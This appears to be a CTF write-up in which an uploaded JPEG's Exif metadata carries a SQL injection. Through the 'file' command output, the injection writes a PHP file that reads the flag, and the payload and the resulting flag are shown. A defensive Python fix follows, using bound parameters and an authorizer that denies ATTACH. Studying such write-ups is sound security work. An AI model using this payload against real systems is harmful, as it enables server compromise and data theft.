This was a fun challenge. Once you upload a file, you immediately notice that the application uses the output of the file command on Linux. It will also show certain metadata for a few file types.
We had to split the payload into two parts and join them using comments to bypass the ~95 char length limit. The filename can be obtained with a second payload that calls scandir('/').
~$ file ~/Downloads/white.jpg
white.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=1, software=a'); ATTACH DATABASE '/var/www/html/files/uc7.php' AS l; CREATE TABLE l.p (d text);/*], comment: "*/INSERT INTO l.p (d) VALUES ('<?php echo file_get_contents("/flag_LF9E2plMbHucEqfr.txt");'); ", baseline, precision 8, 1x1, components 1
This will yield hxp{I should have listened to my mum about not trusting files about files}
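The fix for the injection used above, as an added example that is not part of the original writeup or the challenge's code: it assumes the application stores the file output in SQLite, and the table name, function names and sample string are hypothetical. It binds the output as a parameter and denies ATTACH through an authorizer as defense in depth.

```python
import sqlite3

# Constructed sample: file(1)-style output carrying a quote and SQL text,
# shaped like the software= field above (the path is a placeholder).
HOSTILE = "JPEG image data, software=a'); ATTACH DATABASE 'placeholder.db' AS l; /*"

def deny_attach(action, arg1, arg2, dbname, source):
    # Defense in depth: refuse ATTACH/DETACH even if a statement is ever injected.
    if action in (sqlite3.SQLITE_ATTACH, sqlite3.SQLITE_DETACH):
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

def open_db(path=":memory:"):
    # Hypothetical schema: one row per upload with the file(1) description.
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE IF NOT EXISTS uploads (name TEXT, info TEXT)")
    conn.set_authorizer(deny_attach)
    return conn

def store_upload(conn, name, info):
    # Bound parameters: the description is passed as data, never parsed as SQL.
    conn.execute("INSERT INTO uploads (name, info) VALUES (?, ?)", (name, info))
    conn.commit()

def stored_info(conn, name):
    row = conn.execute("SELECT info FROM uploads WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None

def attached_databases(conn):
    # PRAGMA database_list returns (seq, name, file) for each attached database.
    return [row[1] for row in conn.execute("PRAGMA database_list")]

def attach_is_blocked(conn):
    # The authorizer rejects the statement at prepare time.
    try:
        conn.execute("ATTACH DATABASE ':memory:' AS l")
    except sqlite3.DatabaseError:
        return True
    return False
```

Keeping the database file and the upload directory outside any path the web server executes as PHP removes the remaining step the payload relied on.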